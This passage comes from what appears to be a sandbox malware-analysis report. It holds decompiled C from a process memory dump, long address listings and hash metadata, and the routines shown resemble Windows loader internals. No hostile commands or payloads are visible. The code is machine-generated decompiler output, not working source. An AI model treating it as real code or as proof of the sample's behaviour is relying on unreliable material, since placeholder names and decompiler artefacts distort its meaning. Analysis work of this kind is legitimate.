                                                                                                            												 *_t140 = 0;
                                                                                                            											}
                                                                                                            										}
                                                                                                            										_t256 = _a12;
                                                                                                            										if(_t256 != 0) {
                                                                                                            											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                                                                            										}
                                                                                                            										_t257 =  *_t205;
                                                                                                            										_v48 = 0;
                                                                                                            										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                                                                            										_v56 = 0;
                                                                                                            										_v52 = 0;
                                                                                                            										_t144 =  *( *[fs:0x30] + 0x50);
                                                                                                            										if(_t144 != 0) {
                                                                                                            											__eflags =  *_t144;
                                                                                                            											if( *_t144 == 0) {
                                                                                                            												goto L20;
                                                                                                            											}
                                                                                                            											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                                            											goto L21;
                                                                                                            										} else {
                                                                                                            											L20:
                                                                                                            											_t145 = 0x7ffe0384;
                                                                                                            											L21:
                                                                                                            											if( *_t145 != 0) {
                                                                                                            												_t146 =  *[fs:0x30];
                                                                                                            												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                                                                            												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                                                                            													_t147 = E01087D50();
                                                                                                            													__eflags = _t147;
                                                                                                            													if(_t147 == 0) {
                                                                                                            														_t148 = 0x7ffe0385;
                                                                                                            													} else {
                                                                                                            														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                                            													}
                                                                                                            													__eflags =  *_t148 & 0x00000020;
                                                                                                            													if(( *_t148 & 0x00000020) != 0) {
                                                                                                            														_t149 = _v72;
                                                                                                            														__eflags = _t149;
                                                                                                            														if(__eflags == 0) {
                                                                                                            															_t149 = 0x1045c80;
                                                                                                            														}
                                                                                                            														_push(_t149);
                                                                                                            														_push( &_v48);
                                                                                                            														 *((char*)(_t267 + 0xb)) = E0109F6E0(_t198, _t242, _t257, __eflags);
                                                                                                            														_push(_t257);
                                                                                                            														_push( &_v64);
                                                                                                            														_t153 = E0109F6E0(_t198, _t242, _t257, __eflags);
                                                                                                            														__eflags =  *((char*)(_t267 + 0xb));
                                                                                                            														if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                                            															__eflags = _t153;
                                                                                                            															if(_t153 != 0) {
                                                                                                            																__eflags = 0;
                                                                                                            																E010E7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                                                                            																L01082400(_t267 + 0x20);
                                                                                                            															}
                                                                                                            															L01082400( &_v64);
                                                                                                            														}
                                                                                                            													}
                                                                                                            												}
                                                                                                            											}
                                                                                                            											_t129 = 0;
                                                                                                            											L23:
                                                                                                            											return _t129;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L8:
                                                                                                            							_t275 = _t240;
                                                                                                            							if(_t275 != 0) {
                                                                                                            								_v73 = 0;
                                                                                                            								_t253 = 0;
                                                                                                            								__eflags = 0;
                                                                                                            								L29:
                                                                                                            								_push(0);
                                                                                                            								_t241 = E01092397(_t240);
                                                                                                            								__eflags = _t241;
                                                                                                            								if(_t241 == 0) {
                                                                                                            									_t229 = 0;
                                                                                                            									L14:
                                                                                                            									_t135 = 0;
                                                                                                            									goto L15;
                                                                                                            								}
                                                                                                            								__eflags =  *((char*)(_t267 + 0xb));
                                                                                                            								 *(_t241 + 0x34) = 1;
                                                                                                            								if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                                            									E01082280(_t134, 0x1158608);
                                                                                                            									__eflags =  *0x1156e48 - _t253; // 0x0
                                                                                                            									if(__eflags != 0) {
                                                                                                            										L48:
                                                                                                            										_t253 = 0;
                                                                                                            										__eflags = 0;
                                                                                                            										L49:
                                                                                                            										E0107FFB0(_t198, _t241, 0x1158608);
                                                                                                            										__eflags = _t253;
                                                                                                            										if(_t253 != 0) {
                                                                                                            											L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                                                                            										}
                                                                                                            										goto L31;
                                                                                                            									}
                                                                                                            									 *0x1156e48 = _t241;
                                                                                                            									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                                                                            									__eflags = _t253;
                                                                                                            									if(_t253 != 0) {
                                                                                                            										_t57 = _t253 + 0x34;
                                                                                                            										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                                                                            										__eflags =  *_t57;
                                                                                                            										if( *_t57 == 0) {
                                                                                                            											goto L49;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									goto L48;
                                                                                                            								}
                                                                                                            								L31:
                                                                                                            								_t229 = _t241;
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            							_v73 = 1;
                                                                                                            							_v64 = _t240;
                                                                                                            							asm("lock bts dword [esi], 0x0");
                                                                                                            							if(_t275 < 0) {
                                                                                                            								_t231 =  *0x1158608; // 0x0
                                                                                                            								while(1) {
                                                                                                            									_v60 = _t231;
                                                                                                            									__eflags = _t231 & 0x00000001;
                                                                                                            									if((_t231 & 0x00000001) != 0) {
                                                                                                            										goto L76;
                                                                                                            									}
                                                                                                            									_t73 = _t231 + 1; // 0x1
                                                                                                            									_t210 = _t73;
                                                                                                            									asm("lock cmpxchg [edi], ecx");
                                                                                                            									__eflags = _t231 - _t231;
                                                                                                            									if(_t231 != _t231) {
                                                                                                            										L92:
                                                                                                            										_t133 = E01096B90(_t210,  &_v64);
                                                                                                            										_t262 =  *0x1158608; // 0x0
                                                                                                            										L93:
                                                                                                            										_t231 = _t262;
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									_t240 = _v56;
                                                                                                            									goto L10;
                                                                                                            									L76:
                                                                                                            									_t169 = E0109E180(_t133);
                                                                                                            									__eflags = _t169;
                                                                                                            									if(_t169 != 0) {
                                                                                                            										_push(0xc000004b);
                                                                                                            										_push(0xffffffff);
                                                                                                            										E010A97C0();
                                                                                                            										_t231 = _v68;
                                                                                                            									}
                                                                                                            									_v72 = 0;
                                                                                                            									_v24 =  *( *[fs:0x18] + 0x24);
                                                                                                            									_v16 = 3;
                                                                                                            									_v28 = 0;
                                                                                                            									__eflags = _t231 & 0x00000002;
                                                                                                            									if((_t231 & 0x00000002) == 0) {
                                                                                                            										_v32 =  &_v36;
                                                                                                            										_t174 = _t231 >> 4;
                                                                                                            										__eflags = 1 - _t174;
                                                                                                            										_v20 = _t174;
                                                                                                            										asm("sbb ecx, ecx");
                                                                                                            										_t210 = 3 |  &_v36;
                                                                                                            										__eflags = _t174;
                                                                                                            										if(_t174 == 0) {
                                                                                                            											_v20 = 0xfffffffe;
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										_v32 = 0;
                                                                                                            										_v20 = 0xffffffff;
                                                                                                            										_v36 = _t231 & 0xfffffff0;
                                                                                                            										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                                                                            										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                                                                            									}
                                                                                                            									asm("lock cmpxchg [edi], esi");
                                                                                                            									_t262 = _t231;
                                                                                                            									__eflags = _t262 - _t231;
                                                                                                            									if(_t262 != _t231) {
                                                                                                            										goto L92;
                                                                                                            									} else {
                                                                                                            										__eflags = _v72;
                                                                                                            										if(_v72 != 0) {
                                                                                                            											E010A006A(0x1158608, _t210);
                                                                                                            										}
                                                                                                            										__eflags =  *0x7ffe036a - 1;
                                                                                                            										if(__eflags <= 0) {
                                                                                                            											L89:
                                                                                                            											_t133 =  &_v16;
                                                                                                            											asm("lock btr dword [eax], 0x1");
                                                                                                            											if(__eflags >= 0) {
                                                                                                            												goto L93;
                                                                                                            											} else {
                                                                                                            												goto L90;
                                                                                                            											}
                                                                                                            											do {
                                                                                                            												L90:
                                                                                                            												_push(0);
                                                                                                            												_push(0x1158608);
                                                                                                            												E010AB180();
                                                                                                            												_t133 = _v24;
                                                                                                            												__eflags = _t133 & 0x00000004;
                                                                                                            											} while ((_t133 & 0x00000004) == 0);
                                                                                                            											goto L93;
                                                                                                            										} else {
                                                                                                            											_t218 =  *0x1156904; // 0x400
                                                                                                            											__eflags = _t218;
                                                                                                            											if(__eflags == 0) {
                                                                                                            												goto L89;
                                                                                                            											} else {
                                                                                                            												goto L87;
                                                                                                            											}
                                                                                                            											while(1) {
                                                                                                            												L87:
                                                                                                            												__eflags = _v16 & 0x00000002;
                                                                                                            												if(__eflags == 0) {
                                                                                                            													goto L89;
                                                                                                            												}
                                                                                                            												asm("pause");
                                                                                                            												_t218 = _t218 - 1;
                                                                                                            												__eflags = _t218;
                                                                                                            												if(__eflags != 0) {
                                                                                                            													continue;
                                                                                                            												}
                                                                                                            												goto L89;
                                                                                                            											}
                                                                                                            											goto L89;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L10:
                                                                                                            							_t229 =  *0x1156e48; // 0x0
                                                                                                            							_v72 = _t229;
                                                                                                            							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                                                            								E0107FFB0(_t198, _t240, 0x1158608);
                                                                                                            								_t253 = _v76;
                                                                                                            								goto L29;
                                                                                                            							} else {
                                                                                                            								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                                                                            								asm("lock cmpxchg [esi], ecx");
                                                                                                            								_t215 = 1;
                                                                                                            								if(1 != 1) {
                                                                                                            									while(1) {
                                                                                                            										_t246 = _t215 & 0x00000006;
                                                                                                            										_t180 = _t215;
                                                                                                            										__eflags = _t246 - 2;
                                                                                                            										_v56 = _t246;
                                                                                                            										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                                                                            										asm("lock cmpxchg [edi], esi");
                                                                                                            										_t248 = _v56;
                                                                                                            										__eflags = _t180 - _t215;
                                                                                                            										if(_t180 == _t215) {
                                                                                                            											break;
                                                                                                            										}
                                                                                                            										_t215 = _t180;
                                                                                                            									}
                                                                                                            									__eflags = _t248 - 2;
                                                                                                            									if(_t248 == 2) {
                                                                                                            										__eflags = 0;
                                                                                                            										E010A00C2(0x1158608, 0, _t235);
                                                                                                            									}
                                                                                                            									_t229 = _v72;
                                                                                                            								}
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t227 = 0;
                                                                                                            				_v75 = 0;
                                                                                                            				if(_t128 != 0) {
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				goto L2;
                                                                                                            			}











































































                                                                                                            0x0109220b
                                                                                                            0x0109220e
                                                                                                            0x010922a9
                                                                                                            0x010922ac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010922b2
                                                                                                            0x010922b5
                                                                                                            0x010d5801
                                                                                                            0x010d5806
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5810
                                                                                                            0x010d5815
                                                                                                            0x010d5818
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d581e
                                                                                                            0x010922bb
                                                                                                            0x010922bb
                                                                                                            0x01092218
                                                                                                            0x01092218
                                                                                                            0x0109221c
                                                                                                            0x01092220
                                                                                                            0x01092222
                                                                                                            0x010922c2
                                                                                                            0x010922c4
                                                                                                            0x010922dc
                                                                                                            0x010922dc
                                                                                                            0x010922e1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010922e7
                                                                                                            0x010922c8
                                                                                                            0x010922cd
                                                                                                            0x010922d3
                                                                                                            0x010922d6
                                                                                                            0x010d5823
                                                                                                            0x010d5825
                                                                                                            0x010d5827
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d582d
                                                                                                            0x00000000
                                                                                                            0x010d582d
                                                                                                            0x00000000
                                                                                                            0x01092228
                                                                                                            0x01092228
                                                                                                            0x00000000
                                                                                                            0x01092228
                                                                                                            0x01092222
                                                                                                            0x01092214
                                                                                                            0x01092214
                                                                                                            0x00000000
                                                                                                            0x01092114
                                                                                                            0x01092114
                                                                                                            0x01092114
                                                                                                            0x0109211a
                                                                                                            0x0109211c
                                                                                                            0x01092348
                                                                                                            0x0109234d
                                                                                                            0x010d5840
                                                                                                            0x010d5845
                                                                                                            0x010d5848
                                                                                                            0x010d584e
                                                                                                            0x010d584e
                                                                                                            0x010d5848
                                                                                                            0x01092353
                                                                                                            0x01092355
                                                                                                            0x01092388
                                                                                                            0x01092388
                                                                                                            0x01092368
                                                                                                            0x0109236a
                                                                                                            0x0109236c
                                                                                                            0x0109238f
                                                                                                            0x00000000
                                                                                                            0x0109236e
                                                                                                            0x0109236e
                                                                                                            0x0109218e
                                                                                                            0x0109218e
                                                                                                            0x01092191
                                                                                                            0x01092195
                                                                                                            0x010d5a03
                                                                                                            0x010d5a06
                                                                                                            0x010d5a0c
                                                                                                            0x010d5a0f
                                                                                                            0x010d5a11
                                                                                                            0x010d5a13
                                                                                                            0x010d5a13
                                                                                                            0x010d5a19
                                                                                                            0x010d5a1f
                                                                                                            0x00000000
                                                                                                            0x0109219b
                                                                                                            0x0109219b
                                                                                                            0x010921a0
                                                                                                            0x01092282
                                                                                                            0x01092284
                                                                                                            0x01092284
                                                                                                            0x01092284
                                                                                                            0x01092284
                                                                                                            0x010921a6
                                                                                                            0x010921a9
                                                                                                            0x010921ac
                                                                                                            0x010921ae
                                                                                                            0x010921b3
                                                                                                            0x0109228b
                                                                                                            0x01092290
                                                                                                            0x01092379
                                                                                                            0x01092296
                                                                                                            0x01092298
                                                                                                            0x01092298
                                                                                                            0x01092290
                                                                                                            0x010921b9
                                                                                                            0x010921be
                                                                                                            0x010922a2
                                                                                                            0x010922a2
                                                                                                            0x010921c4
                                                                                                            0x010921c8
                                                                                                            0x010921cc
                                                                                                            0x010921d0
                                                                                                            0x010921d4
                                                                                                            0x010921de
                                                                                                            0x010921e3
                                                                                                            0x010d5a29
                                                                                                            0x010d5a2c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5a3b
                                                                                                            0x00000000
                                                                                                            0x010921e9
                                                                                                            0x010921e9
                                                                                                            0x010921e9
                                                                                                            0x010921ee
                                                                                                            0x010921f1
                                                                                                            0x010d5a45
                                                                                                            0x010d5a4b
                                                                                                            0x010d5a52
                                                                                                            0x010d5a58
                                                                                                            0x010d5a5d
                                                                                                            0x010d5a5f
                                                                                                            0x010d5a71
                                                                                                            0x010d5a61
                                                                                                            0x010d5a6a
                                                                                                            0x010d5a6a
                                                                                                            0x010d5a76
                                                                                                            0x010d5a79
                                                                                                            0x010d5a7f
                                                                                                            0x010d5a83
                                                                                                            0x010d5a85
                                                                                                            0x010d5a87
                                                                                                            0x010d5a87
                                                                                                            0x010d5a8c
                                                                                                            0x010d5a91
                                                                                                            0x010d5a97
                                                                                                            0x010d5a9f
                                                                                                            0x010d5aa0
                                                                                                            0x010d5aa1
                                                                                                            0x010d5aa6
                                                                                                            0x010d5aab
                                                                                                            0x010d5ab1
                                                                                                            0x010d5ab3
                                                                                                            0x010d5ab9
                                                                                                            0x010d5aca
                                                                                                            0x010d5ad4
                                                                                                            0x010d5ad4
                                                                                                            0x010d5ade
                                                                                                            0x010d5ade
                                                                                                            0x010d5aab
                                                                                                            0x010d5a79
                                                                                                            0x010d5a52
                                                                                                            0x010921f7
                                                                                                            0x010921f9
                                                                                                            0x010921fe
                                                                                                            0x010921fe
                                                                                                            0x010921e3
                                                                                                            0x01092195
                                                                                                            0x0109236c
                                                                                                            0x01092122
                                                                                                            0x01092122
                                                                                                            0x01092124
                                                                                                            0x01092231
                                                                                                            0x01092236
                                                                                                            0x01092236
                                                                                                            0x01092238
                                                                                                            0x01092238
                                                                                                            0x01092240
                                                                                                            0x01092242
                                                                                                            0x01092244
                                                                                                            0x010d59fc
                                                                                                            0x0109218c
                                                                                                            0x0109218c
                                                                                                            0x00000000
                                                                                                            0x0109218c
                                                                                                            0x0109224a
                                                                                                            0x0109224f
                                                                                                            0x01092256
                                                                                                            0x01092304
                                                                                                            0x01092309
                                                                                                            0x0109230f
                                                                                                            0x0109231e
                                                                                                            0x0109231e
                                                                                                            0x0109231e
                                                                                                            0x01092320
                                                                                                            0x01092325
                                                                                                            0x0109232a
                                                                                                            0x0109232c
                                                                                                            0x0109233e
                                                                                                            0x0109233e
                                                                                                            0x00000000
                                                                                                            0x0109232c
                                                                                                            0x01092311
                                                                                                            0x01092317
                                                                                                            0x0109231a
                                                                                                            0x0109231c
                                                                                                            0x01092380
                                                                                                            0x01092380
                                                                                                            0x01092380
                                                                                                            0x01092384
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092386
                                                                                                            0x00000000
                                                                                                            0x0109231c
                                                                                                            0x0109225c
                                                                                                            0x0109225c
                                                                                                            0x00000000
                                                                                                            0x0109225c
                                                                                                            0x0109212a
                                                                                                            0x01092134
                                                                                                            0x01092138
                                                                                                            0x0109213d
                                                                                                            0x010d5858
                                                                                                            0x010d5863
                                                                                                            0x010d5863

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4de8aea71003165ee4b16998d98a450ef178d2bbd55de3b97245c1f7e9e66cdf
                                                                                                            • Instruction ID: 5183acb70d3448e256f2af1495b4c8e8628b58ea57058ce0ce151c3ad3e9393b
                                                                                                            • Opcode Fuzzy Hash: 4de8aea71003165ee4b16998d98a450ef178d2bbd55de3b97245c1f7e9e66cdf
                                                                                                            • Instruction Fuzzy Hash: 34F11371608301EFEB66CF2CC85076ABBF1AF95324F0485ADE9E59B281D734D841DB92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E0107D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v20;
                                                                                                            				signed int _v36;
                                                                                                            				intOrPtr* _v40;
                                                                                                            				signed int _v44;
                                                                                                            				signed int _v48;
                                                                                                            				signed char _v52;
                                                                                                            				signed int _v60;
                                                                                                            				signed int _v64;
                                                                                                            				signed int _v68;
                                                                                                            				signed int _v72;
                                                                                                            				signed int _v76;
                                                                                                            				intOrPtr _v80;
                                                                                                            				signed int _v84;
                                                                                                            				intOrPtr _v100;
                                                                                                            				intOrPtr _v104;
                                                                                                            				signed int _v108;
                                                                                                            				signed int _v112;
                                                                                                            				signed int _v116;
                                                                                                            				intOrPtr _v120;
                                                                                                            				signed int _v132;
                                                                                                            				char _v140;
                                                                                                            				char _v144;
                                                                                                            				char _v157;
                                                                                                            				signed int _v164;
                                                                                                            				signed int _v168;
                                                                                                            				signed int _v169;
                                                                                                            				intOrPtr _v176;
                                                                                                            				signed int _v180;
                                                                                                            				signed int _v184;
                                                                                                            				intOrPtr _v188;
                                                                                                            				signed int _v192;
                                                                                                            				signed int _v200;
                                                                                                            				signed int _v208;
                                                                                                            				intOrPtr* _v212;
                                                                                                            				char _v216;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t204;
                                                                                                            				void* _t208;
                                                                                                            				signed int _t211;
                                                                                                            				signed int _t216;
                                                                                                            				intOrPtr _t217;
                                                                                                            				intOrPtr* _t218;
                                                                                                            				signed int _t226;
                                                                                                            				signed int _t239;
                                                                                                            				signed int* _t247;
                                                                                                            				signed int _t249;
                                                                                                            				void* _t252;
                                                                                                            				signed int _t256;
                                                                                                            				signed int _t269;
                                                                                                            				signed int _t271;
                                                                                                            				signed int _t277;
                                                                                                            				signed int _t279;
                                                                                                            				intOrPtr _t283;
                                                                                                            				signed int _t287;
                                                                                                            				signed int _t288;
                                                                                                            				void* _t289;
                                                                                                            				signed char _t290;
                                                                                                            				signed int _t292;
                                                                                                            				signed int* _t293;
                                                                                                            				signed int _t306;
                                                                                                            				signed int _t307;
                                                                                                            				signed int _t308;
                                                                                                            				signed int _t309;
                                                                                                            				signed int _t310;
                                                                                                            				intOrPtr _t311;
                                                                                                            				intOrPtr _t312;
                                                                                                            				signed int _t319;
                                                                                                            				signed int _t320;
                                                                                                            				signed int* _t324;
                                                                                                            				signed int _t337;
                                                                                                            				signed int _t338;
                                                                                                            				signed int _t339;
                                                                                                            				signed int* _t340;
                                                                                                            				void* _t341;
                                                                                                            				signed int _t344;
                                                                                                            				signed int _t348;
                                                                                                            				signed int _t349;
                                                                                                            				signed int _t351;
                                                                                                            				intOrPtr _t353;
                                                                                                            				void* _t354;
                                                                                                            				signed int _t356;
                                                                                                            				signed int _t358;
                                                                                                            				intOrPtr _t359;
                                                                                                            				signed int _t363;
                                                                                                            				signed short* _t365;
                                                                                                            				void* _t367;
                                                                                                            				intOrPtr _t369;
                                                                                                            				void* _t370;
                                                                                                            				signed int _t371;
                                                                                                            				signed int _t372;
                                                                                                            				void* _t374;
                                                                                                            				signed int _t376;
                                                                                                            				void* _t384;
                                                                                                            				signed int _t387;
                                                                                                            
                                                                                                            				_v8 =  *0x115d360 ^ _t376;
                                                                                                            				_t2 =  &_a20;
                                                                                                            				 *_t2 = _a20 & 0x00000001;
                                                                                                            				_t287 = _a4;
                                                                                                            				_v200 = _a12;
                                                                                                            				_t365 = _a8;
                                                                                                            				_v212 = _a16;
                                                                                                            				_v180 = _a24;
                                                                                                            				_v168 = 0;
                                                                                                            				_v157 = 0;
                                                                                                            				if( *_t2 != 0) {
                                                                                                            					__eflags = E01076600(0x11552d8);
                                                                                                            					if(__eflags == 0) {
                                                                                                            						goto L1;
                                                                                                            					} else {
                                                                                                            						_v188 = 6;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L1:
                                                                                                            					_v188 = 9;
                                                                                                            				}
                                                                                                            				if(_t365 == 0) {
                                                                                                            					_v164 = 0;
                                                                                                            					goto L5;
                                                                                                            				} else {
                                                                                                            					_t363 =  *_t365 & 0x0000ffff;
                                                                                                            					_t341 = _t363 + 1;
                                                                                                            					if((_t365[1] & 0x0000ffff) < _t341) {
                                                                                                            						L109:
                                                                                                            						__eflags = _t341 - 0x80;
                                                                                                            						if(_t341 <= 0x80) {
                                                                                                            							_t281 =  &_v140;
                                                                                                            							_v164 =  &_v140;
                                                                                                            							goto L114;
                                                                                                            						} else {
                                                                                                            							_t283 =  *0x1157b9c; // 0x0
                                                                                                            							_t281 = L01084620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                                                                            							_v164 = _t281;
                                                                                                            							__eflags = _t281;
                                                                                                            							if(_t281 != 0) {
                                                                                                            								_v157 = 1;
                                                                                                            								L114:
                                                                                                            								E010AF3E0(_t281, _t365[2], _t363);
                                                                                                            								_t200 = _v164;
                                                                                                            								 *((char*)(_v164 + _t363)) = 0;
                                                                                                            								goto L5;
                                                                                                            							} else {
                                                                                                            								_t204 = 0xc000009a;
                                                                                                            								goto L47;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t200 = _t365[2];
                                                                                                            						_v164 = _t200;
                                                                                                            						if( *((char*)(_t200 + _t363)) != 0) {
                                                                                                            							goto L109;
                                                                                                            						} else {
                                                                                                            							while(1) {
                                                                                                            								L5:
                                                                                                            								_t353 = 0;
                                                                                                            								_t342 = 0x1000;
                                                                                                            								_v176 = 0;
                                                                                                            								if(_t287 == 0) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t384 = _t287 -  *0x1157b90; // 0x77380000
                                                                                                            								if(_t384 == 0) {
                                                                                                            									_t353 =  *0x1157b8c; // 0xc02a20
                                                                                                            									_v176 = _t353;
                                                                                                            									_t320 = ( *(_t353 + 0x50))[8];
                                                                                                            									_v184 = _t320;
                                                                                                            								} else {
                                                                                                            									E01082280(_t200, 0x11584d8);
                                                                                                            									_t277 =  *0x11585f4; // 0xc02f10
                                                                                                            									_t351 =  *0x11585f8 & 1;
                                                                                                            									while(_t277 != 0) {
                                                                                                            										_t337 =  *(_t277 - 0x50);
                                                                                                            										if(_t337 > _t287) {
                                                                                                            											_t338 = _t337 | 0xffffffff;
                                                                                                            										} else {
                                                                                                            											asm("sbb ecx, ecx");
                                                                                                            											_t338 =  ~_t337;
                                                                                                            										}
                                                                                                            										_t387 = _t338;
                                                                                                            										if(_t387 < 0) {
                                                                                                            											_t339 =  *_t277;
                                                                                                            											__eflags = _t351;
                                                                                                            											if(_t351 != 0) {
                                                                                                            												__eflags = _t339;
                                                                                                            												if(_t339 == 0) {
                                                                                                            													goto L16;
                                                                                                            												} else {
                                                                                                            													goto L118;
                                                                                                            												}
                                                                                                            												goto L151;
                                                                                                            											} else {
                                                                                                            												goto L16;
                                                                                                            											}
                                                                                                            											goto L17;
                                                                                                            										} else {
                                                                                                            											if(_t387 <= 0) {
                                                                                                            												__eflags = _t277;
                                                                                                            												if(_t277 != 0) {
                                                                                                            													_t340 =  *(_t277 - 0x18);
                                                                                                            													_t24 = _t277 - 0x68; // 0xc02ea8
                                                                                                            													_t353 = _t24;
                                                                                                            													_v176 = _t353;
                                                                                                            													__eflags = _t340[3] - 0xffffffff;
                                                                                                            													if(_t340[3] != 0xffffffff) {
                                                                                                            														_t279 =  *_t340;
                                                                                                            														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                                                                            														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                                                                            															asm("lock inc dword [edi+0x9c]");
                                                                                                            															_t340 =  *(_t353 + 0x50);
                                                                                                            														}
                                                                                                            													}
                                                                                                            													_v184 = _t340[8];
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												_t339 =  *(_t277 + 4);
                                                                                                            												if(_t351 != 0) {
                                                                                                            													__eflags = _t339;
                                                                                                            													if(_t339 == 0) {
                                                                                                            														goto L16;
                                                                                                            													} else {
                                                                                                            														L118:
                                                                                                            														_t277 = _t277 ^ _t339;
                                                                                                            														goto L17;
                                                                                                            													}
                                                                                                            													goto L151;
                                                                                                            												} else {
                                                                                                            													L16:
                                                                                                            													_t277 = _t339;
                                                                                                            												}
                                                                                                            												goto L17;
                                                                                                            											}
                                                                                                            										}
                                                                                                            										goto L25;
                                                                                                            										L17:
                                                                                                            									}
                                                                                                            									L25:
                                                                                                            									E0107FFB0(_t287, _t353, 0x11584d8);
                                                                                                            									_t320 = _v184;
                                                                                                            									_t342 = 0x1000;
                                                                                                            								}
                                                                                                            								if(_t353 == 0) {
                                                                                                            									break;
                                                                                                            								} else {
                                                                                                            									_t366 = 0;
                                                                                                            									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                                                                            										_t288 = _v164;
                                                                                                            										if(_t353 != 0) {
                                                                                                            											_t342 = _t288;
                                                                                                            											_t374 = E010BCC99(_t353, _t288, _v200, 1,  &_v168);
                                                                                                            											if(_t374 >= 0) {
                                                                                                            												if(_v184 == 7) {
                                                                                                            													__eflags = _a20;
                                                                                                            													if(__eflags == 0) {
                                                                                                            														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                                                                            														if(__eflags != 0) {
                                                                                                            															_t271 = E01076600(0x11552d8);
                                                                                                            															__eflags = _t271;
                                                                                                            															if(__eflags == 0) {
                                                                                                            																_t342 = 0;
                                                                                                            																_v169 = _t271;
                                                                                                            																_t374 = E01077926( *(_t353 + 0x50), 0,  &_v169);
                                                                                                            															}
                                                                                                            														}
                                                                                                            													}
                                                                                                            												}
                                                                                                            												if(_t374 < 0) {
                                                                                                            													_v168 = 0;
                                                                                                            												} else {
                                                                                                            													if( *0x115b239 != 0) {
                                                                                                            														_t342 =  *(_t353 + 0x18);
                                                                                                            														E010EE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                                                                            													}
                                                                                                            													if( *0x1158472 != 0) {
                                                                                                            														_v192 = 0;
                                                                                                            														_t342 =  *0x7ffe0330;
                                                                                                            														asm("ror edi, cl");
                                                                                                            														 *0x115b1e0( &_v192, _t353, _v168, 0, _v180);
                                                                                                            														 *( *0x115b218 ^  *0x7ffe0330)();
                                                                                                            														_t269 = _v192;
                                                                                                            														_t353 = _v176;
                                                                                                            														__eflags = _t269;
                                                                                                            														if(__eflags != 0) {
                                                                                                            															_v168 = _t269;
                                                                                                            														}
                                                                                                            													}
                                                                                                            												}
                                                                                                            											}
                                                                                                            											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                                                                            												_t366 = 0xc000007a;
                                                                                                            											}
                                                                                                            											_t247 =  *(_t353 + 0x50);
                                                                                                            											if(_t247[3] == 0xffffffff) {
                                                                                                            												L40:
                                                                                                            												if(_t366 == 0xc000007a) {
                                                                                                            													__eflags = _t288;
                                                                                                            													if(_t288 == 0) {
                                                                                                            														goto L136;
                                                                                                            													} else {
                                                                                                            														_t366 = 0xc0000139;
                                                                                                            													}
                                                                                                            													goto L54;
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												_t249 =  *_t247;
                                                                                                            												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                                                                            													goto L40;
                                                                                                            												} else {
                                                                                                            													_t250 = _t249 | 0xffffffff;
                                                                                                            													asm("lock xadd [edi+0x9c], eax");
                                                                                                            													if((_t249 | 0xffffffff) == 0) {
                                                                                                            														E01082280(_t250, 0x11584d8);
                                                                                                            														_t342 =  *(_t353 + 0x54);
